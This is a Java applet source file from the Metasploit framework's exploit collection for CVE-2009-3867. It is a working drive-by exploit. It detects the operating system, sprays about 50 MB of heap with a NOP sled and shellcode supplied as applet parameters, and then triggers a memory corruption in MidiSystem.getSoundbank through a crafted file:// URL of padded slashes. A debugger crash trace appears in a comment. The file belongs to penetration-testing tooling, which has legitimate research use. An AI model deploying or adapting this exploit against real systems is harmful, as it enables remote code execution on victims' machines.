metasploit-framework/external/source/exploits/CVE-2009-3867/AppletX.java

143 lines
3.3 KiB
Java
Raw Normal View History

import javax.sound.midi.*;
import java.io.*;
import java.nio.*;
import java.net.*;
/*
*
* comments from KF on Mac OS X:
*
Spray heap
Invalid memory access of location 0000000f eip=90909090
Program received signal EXC_BAD_ACCESS, Could not access memory.
Reason: KERN_PROTECTION_FAILURE at address: 0x0000000f
[Switching to process 385 thread 0x15107]
0x90909090 in _NSReadAttributedStringFromURLOrData ()
(gdb) bt
#0 0x90909090 in _NSReadAttributedStringFromURLOrData ()
#1 0x255a255a in ?? ()
*
*/
public class AppletX extends java.applet.Applet
{
private IntBuffer [] mem;
public void init()
{
String fName = "";
fName = repeat('/', 303);
// detect OS
String os = System.getProperty("os.name").toLowerCase();
if (os.indexOf( "win" ) >= 0)
fName = repeat('/', 302); // 1.6.0_u16,u11
// fName = repeat('/', 304); // 1.5.0_u21 (problems lurking)
else if (os.indexOf( "mac" ) >= 0)
//fName = repeat('/',1118); // OSX Snow Leopard
fName = repeat('/',1080); // OSX Leopard
else if (os.indexOf( "nix") >=0 || os.indexOf( "nux") >=0)
fName = repeat('/', 1337); // not tested
else
// not supported
return;
// heap sprayed info starts at 0x25580000+12 but we need to be fairly ascii safe. 0x80 will not fly
// fName = "file://" + fName + "$\"$\"$\"$\"$\"$\""; // 1.5.x
fName = "file://" + fName + "Z%Z%Z%Z%Z%Z%";
// trigger vuln
try
{
mem = spray(getParameter("sc"), getParameter("np"));
// System.out.println("Sprayed!");
MidiSystem.getSoundbank(new URL(fName));
// just in case, thread doesn't typically return from above :)
while (true)
{
Thread.sleep(10);
}
}
catch(Exception e)
{
System.out.println(e);
}
}
public static String repeat(char c,int i)
{
String tst = "";
for (int j = 0; j < i; j++)
{
tst = tst+c;
}
return tst;
}
// based on:
// http://stackoverflow.com/questions/140131/convert-a-string-representation-of-a-hex-dump-to-a-byte-array-using-java
public static short[] HexDecode(String s)
{
short[] data = new short[s.length()/2];
for (int i = 0; i < s.length(); i += 2)
{
char c1 = s.charAt(i);
char c2 = s.charAt(i + 1);
int comb = Character.digit(c1, 16) & 0xff;
comb <<= 4;
comb += Character.digit(c2, 16) & 0xff;
data[i/2] = (short)comb;
}
return data;
}
public final IntBuffer [] spray(String sc, String np)
{
short [] sc_bytes = HexDecode(sc);
short [] np_bytes = HexDecode(np);
return spray (sc_bytes, np_bytes);
}
public final IntBuffer [] spray(short[] sc, short[] np)
{
int cnt = 50; // total 50 mb
int sz = 1024*1024; // 1 mb
int nops = (sz / 4) - (sc.length);
IntBuffer [] ret = new IntBuffer[cnt];
for (int bi = 0; bi < cnt; bi++)
{
IntBuffer ib = IntBuffer.allocate(sz / 4);
for (int i = 0; i < nops; ++i)
ib.put((np[0]
| (np[1] << 8)
| (np[2] << 16)
| (np[3] << 24)));
// ib.put(0x90909090);
for (int i = 0; i < sc.length; )
ib.put((sc[i++]
| (sc[i++] << 8)
| (sc[i++] << 16)
| (sc[i++] << 24)));
ret[bi] = ib;
}
return ret;
}
}